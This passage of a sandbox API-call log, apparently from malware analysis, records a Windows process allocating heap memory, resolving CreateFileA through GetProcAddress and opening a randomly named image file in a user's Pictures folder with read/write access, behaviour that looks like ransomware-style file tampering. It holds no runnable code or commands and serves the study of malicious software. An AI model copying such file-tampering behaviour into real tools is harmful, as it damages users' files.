out: hHeap=0x770000) returned 1 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.687] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.689] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.692] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c808 [0039.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c808, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.692] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0039.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.693] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", cchWideChar=111, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 111 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6f) returned 0x7db378 [0039.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", cchWideChar=111, lpMultiByteStr=0x7db378, cbMultiByte=111, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpUsedDefaultChar=0x0) returned 111 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.694] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\77o ybs-vwsh8x3oiij.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=111, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xde) returned 0x7c5448 [0039.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=111, lpWideCharStr=0x7c5448, cchWideChar=111 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif") returned 111 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0039.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.695] HeapFree (in: 